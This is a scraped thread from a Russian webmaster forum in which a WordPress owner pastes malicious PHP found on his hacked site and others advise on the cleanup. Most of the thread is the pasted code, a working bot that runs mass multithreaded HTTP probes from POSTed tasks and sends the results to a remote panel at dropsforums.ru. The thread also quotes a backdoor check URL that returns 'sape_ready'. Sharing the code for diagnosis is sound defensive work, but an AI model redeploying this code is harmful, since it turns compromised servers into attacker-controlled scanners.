$p_request = 'post'; else $p_request = 'get'; $p_requestbody = $_POST['requestbody']; $p_regex = $_POST['regex']; $p_regex_logic = $_POST['regex_logic']; $p_onlybody = $_POST['onlybody']; $p_onlyheaders = $_POST['onlyheaders']; $p_client_id = $_POST['client_id']; $p_proc_id = $_POST['proc_id']; $all_links_o = $all_links; $double_links = array(); $onlybh = 0; if($p_onlybody == '1') $onlybh = 1; if($p_onlyheaders == '1') $onlybh = 2; $i = 1; while(count($all_links) > 0) { $links_part = array_splice($all_links, 0, $p_threads); $multithread = new MultiThread($link_timeout); $multithread->setLinks($links_part); $multithread->setMethod($p_request,$p_requestbody,$onlybh); $links_result = $multithread->execute(); foreach($links_result as $res_el) { if(!empty($res_el['linkerror']) && $res_el['answer']!='596') $curl_result[$i] = $res_el['link'].'-\|\|-error'; elseif(vf_regex($res_el['answer'],$p_regex,$p_regex_logic) === true) { $curl_result[$i] = $res_el['link'].'-\|\|-good'; } else { $curl_result[$i] = $res_el['link'].'-\|\|-bad'; if($res_el['linkerror'] == '2' \|\| $res_el['linkerror'] == '3') $double_links[$i] = $all_links_o[($i-1)]; } $i++; } sleep($p_delay); } while(count($double_links) > 0) { $links_part = array_slice($double_links, 0, $p_threads, true); $t_count = count($double_links) - $p_threads; $double_links = array_slice($double_links, $p_threads, $t_count, true); $multithread = new MultiThread($link_timeout, 1); $multithread->setLinks($links_part); $multithread->setMethod($p_request,$p_requestbody,$onlybh); $links_result = $multithread->execute(); foreach($links_result as $res_el) { if(!empty($res_el['linkerror']) && $res_el['answer']!='596') $curl_result[$res_el['lk']] = $res_el['link'].'-\|\|-error'; elseif(vf_regex($res_el['answer'],$p_regex,$p_regex_logic) === true) $curl_result[$res_el['lk']] = $res_el['link'].'-\|\|-good'; else $curl_result[$res_el['lk']] = $res_el['link'].'-\|\|-bad'; } sleep($p_delay); } //print_r($curl_result); $curl_result = implode('_\|\|_',$curl_result); $server_url = 'http://dropsforums.ru/panel/proc/receive_result.php'; $result_init = curl_init($server_url); curl_setopt($result_init, CURLOPT_POST, true); curl_setopt($result_init, CURLOPT_TIMEOUT, 15); curl_setopt($result_init, CURLOPT_CONNECTTIMEOUT, 15); curl_setopt($result_init, CURLOPT_RETURNTRANSFER, true); curl_setopt($result_init, CURLOPT_POSTFIELDS, array('hashcode' => $hashcode, 'taskid' => $p_taskid, 'taskname' => $p_taskname, 'client_id' => $p_client_id, 'proc_id' => $p_proc_id, 'vffsockopen' => $vffsockopen, 'result' => $curl_result)); curl_exec($result_init); curl_close($result_init); class MultiThread { private $maxthreads, $links = array(), $linkscount, $threads = array(), $mtype = 'get', $mcontent, $onlyBody = 0, $onlyHeaders = 0, $results = array(); public function __construct($link_timeout = 1, $double_req = 0, $maxthreads = 150) { $this->link_timeout = $link_timeout; $this->double_req = $double_req; if($this->double_req == 1) { $this->sock_timeout = 3; $this->link_timeout += 2; } else $this->sock_timeout = 2; $this->maxthreads = $maxthreads; } public function setLinks($links = array()) { $this->links = $links; $this->linkscount = count($this->links); if($this->linkscount > $this->maxthreads) $this->links = array_slice($this->links, 0, $this->maxthreads); } public function setMethod($type,$mcontent='',$onlyBH=0) { $this->mtype = $type; $this->mcontent = $mcontent; if($onlyBH == 1) $this->onlyBody = '1'; elseif($onlyBH == 2) $this->onlyHeaders = '1'; } public function execute() { $li = 0; $t_redirects = array(); foreach ($this->links as $lk => $link) { $li++; $this->results[$li] = array('link' => $link, 'lk' => $lk, 'answer' => '', 'linkerror' => '', 'setonlyBody' => 0); $t_redirects[$li] = 0; $link_ar = parse_url($link); if(isset($link_ar['host'])) { $server = $link_ar['host']; if(!$fsock = @fsockopen($server, 80, $erno, $erstr, $this->sock_timeout)) { if(strpos($erstr,'Name or service not known') !== false) $this->results[$li]['answer'] = '596'; $this->results[$li]['linkerror'] = '2'; } else { $out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent); fwrite($fsock, $out); stream_set_timeout($fsock, $this->link_timeout); stream_set_blocking($fsock, 0); $this->threads[$li] = $fsock; } } else $this->results[$li]['linkerror'] = '1'; } $threads_start = time() + floatval(microtime()); do { foreach ($this->threads as $key=>$value) { $threads_time = round((time() + floatval(microtime()) - $threads_start),2); if(feof($value) \|\| $threads_time > ($this->link_timeout+8)) { fclose($value); unset($this->threads[$key]); } else { $vf_timeout = stream_get_meta_data($value); if($vf_timeout['timed_out'] === true) { $this->results[$key]['linkerror'] = '3'; fclose($value); unset($this->threads[$key]); continue; } //$t_answer = fgets($value); $t_answer = fread($value, 10240); if(!empty($t_answer)) { if(stristr($t_answer,"location:")!='' && (stristr($t_answer,"301 Moved")!='' \|\| stristr($t_answer,"301 Found")!='' \|\| stristr($t_answer,"302 Found")!='' \|\| stristr($t_answer,"302 Moved")!='' \|\| stristr($t_answer,"302 Redirect")!='' \|\| stristr($t_answer,"303 See")!='') && $t_redirects[$key]<3) { $link_redirect = preg_match('/^Location: (.+?)$/Um', $t_answer, $t_matches); $t_redirects[$key] += 1; $t_matches[1] = trim($t_matches[1]); echo $this->results[$key]['link'].' - '.$t_matches[1]."\n\n"; if(substr($t_matches[1],0,5) == 'https') { $link_ar = parse_url($t_matches[1]); $server = $link_ar['host']; if(!$fsock = @fsockopen('ssl://'.$server, 443, $erno, $erstr, $this->sock_timeout)) { $this->results[$key]['linkerror'] = '4'; fclose($value); unset($this->threads[$key]); } else { $this->results[$key]['link'] = $t_matches[1]; $out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent); fwrite($fsock, $out); stream_set_timeout($fsock, $this->link_timeout); stream_set_blocking($fsock, 0); $this->threads[$key] = $fsock; $this->results[$key]['answer'] = ''; continue; } } else { if(substr($t_matches[1],0,4) != 'http') { $link_ar = parse_url($this->results[$key]['link']); $server = $link_ar['host']; $t_matches[1] = 'http://'.$server.(substr($t_matches[1],0,1)=='/'?'':'/').$t_matches[1]; } $link_ar = parse_url(trim($t_matches[1])); $server = $link_ar['host']; fclose($value); unset($this->threads[$key]); if(!$fsock = @fsockopen($server, 80, $erno, $erstr, $this->sock_timeout)) { $this->results[$key]['linkerror'] = '5'; } else { $this->results[$key]['link'] = $t_matches[1]; $out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent); fwrite($fsock, $out); stream_set_timeout($fsock, $this->link_timeout); stream_set_blocking($fsock, 0); $this->threads[$key] = $fsock; $this->results[$key]['answer'] = ''; continue; } } } $this->results[$key]['answer'] .= $t_answer; if($this->onlyBody == 1 && $this->results[$key]['setonlyBody'] == 0) { if(strpos($this->results[$key]['answer'],"\r\n\r\n") !== false) { $body_ar = explode("\r\n\r\n",$this->results[$key]['answer'],2); $this->results[$key]['answer'] = $body_ar[1]; $this->results[$key]['setonlyBody'] = 1; } } elseif($this->onlyHeaders == 1) { if(strpos($this->results[$key]['answer'],"\r\n\r\n") !== false) { $header_ar = explode("\r\n\r\n",$this->results[$key]['answer']); $this->results[$key]['answer'] = $header_ar[0]; fclose($value); unset($this->threads[$key]); } } } } } usleep(10000); } while (count($this->threads) > 0); return $this->results; } } function get_fwrite_data($link_ar, $mtype='get', $content) { $server = $link_ar['host']; $query = isset($link_ar['path']) ? $link_ar['path'] : '/'; if(isset($link_ar['query'])) $query .= '?'.$link_ar['query']; if($mtype=='post') { $result = "POST $query HTTP/1.1\r\n"; $result .= "Host: $server\r\n"; $result .= "Cookie: income=1\r\n"; $result .= "Content-Type: application/x-www-form-urlencoded\r\n"; $result .= "Content-Length: ".strlen($content)."\r\n"; $result .= "Connection: Close\r\n\r\n"; $result .= $content; } elseif($mtype=='get') { $result = "GET $query HTTP/1.1\r\n"; $result .= "Host: $server\r\n"; $result .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8\r\n"; //$result .= "Accept: text/xml,application/xml,application/xhtml+xml,application/json,text/html;q=0.9,text/plain;q=0.8,image/png,/*;q=0.5\r\n"; //$result .= "Referer: http://armsites.info\r\n"; $result .= "User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\r\n"; $result .= "Connection: Close\r\n\r\n"; } return $result; } function vf_regex($answer, $regex, $regex_logic = 3) { if($regex_logic == '1') { if(preg_match($regex,$answer)) return true; } elseif($regex_logic == '2') { if(!preg_match($regex,$answer)) return true; } elseif($regex_logic == '3') { $regex = str_replace("\n",'',$regex); $answer = str_replace("\n",'',$answer); if(strpos($answer,$regex) !== false) return true; } elseif($regex_logic == '4') { $regex = str_replace("\n",'',$regex); $answer = str_replace("\n",'',$answer); if(strpos($answer,$regex) === false) return true; } return false; } ?> [свернуть] Удалил всё. Поиски продолжаю.. ---------- Сообщение добавлено 10:28 ---------- Предыдущее 10:20 ---------- Ещё здесь /wp-admin//link-parse-editor.php ---------- Сообщение добавлено 11:07 ---------- Предыдущее 10:28 ---------- Выяснилось, что произошло заражение и через сайт размещают ссылки SAPE ---------- Сообщение добавлено 11:56 ---------- Предыдущее 11:07 ---------- С помощью логов обнаружил такой момент: если добавить к адресу сайта /index.php?itemid=act&check=1&proverka=1, то пишет sape_ready
0 Gann

	08.06.2016 15:49 #6
Gann Рождённый в СССР Регистрация: 30.04.2012 Сообщений: 1,073 Репутация: 310	Всё вроде нашёл, всё удалил... при добавлении к адресу сайта index.php?itemid=act&check=1&proverka=1 вы даёт sape_ready. Кто-нибудь знает где искать? Кстати, злодей с Украины, я не сильно удивлён
0 Gann

Подскажите, что это такое и зачем на сайте под Вордпресс?

Опции темы

Развернуть текст

Развернуть текст

Развернуть текст

Спасибо сказали:

Спасибо сказали:

Тэги топика:

Похожие темы

Подскажите как сделать справочник на сайте вордпресс?

Поиск во всех файлах редактора вордпресс-есть такое или нет?

Что такое дорвей? Зачем нужны дорвеи? Сколько можно заработать на дорвеях?

Поиск во всех файлах редактора вордпресс-есть такое или нет?

Зачем скрывать текст на сайте?

Тем:

Сообщений:

Пользователей:

Сейчас на сайте:

Вход

Сайт

Разделы

Прочее

Следите за нами

Витрина ссылок

У нас проходит

У кого попросить инвайт?

Золотые темы форума

Последние новости

Популярные темы

Информеры

	08.06.2016 16:47 #8
Gann Рождённый в СССР Регистрация: 30.04.2012 Сообщений: 1,073 Репутация: 310	Fartuna, наверное так и сделаю... Вообще никаких последствий заражения пока нету - нет ни ссылок, ничего... просто лишние коды в файлах. Ну index.php?itemid=act&check=1&proverka=1 - вот только это беспокоит
0 Gann

	09.06.2016 05:35 #9
Lastwarrior Гуру Регистрация: 22.04.2014 Сообщений: 988 Репутация: 133	Сообщение от Gann наверное так и сделаю... Вообще никаких последствий заражения пока нету - нет ни ссылок, ничего... просто лишние коды в файлах. Дали отстоятся просто твоему пирогу, а ссылки могут и на свои ресурсы поставить если надо или дор какой-нибудь со временем зальют. Надежный и отзывчивый VPS Хостинг для серьёзных проектов.
0 Lastwarrior

	17.06.2016 01:11 #10
Бабайка Опытный Регистрация: 08.06.2004 Сообщений: 309 Репутация: 27	Увидел eval в коде - убей его. p.s. причем дырка может быть и не у тебя, а у хостера. «Спорт Опт»: карематы, сидушки, спальники, спасжилеты, утяжелители, пояса, груши
0 Бабайка

Темы	Раздел	Ответов	Последний пост
Подскажите как сделать справочник на сайте вордпресс?	WordPress	4	22.01.2016 21:32
Поиск во всех файлах редактора вордпресс-есть такое или нет?	WordPress	11	07.11.2014 15:05
Что такое дорвей? Зачем нужны дорвеи? Сколько можно заработать на дорвеях?	Дорвеи и black SEO	15	06.10.2014 18:23
Поиск во всех файлах редактора вордпресс-есть такое или нет?	Оффтоп и свободные темы	1	19.09.2014 11:30
Зачем скрывать текст на сайте?	Web программирование	0	01.11.2011 19:53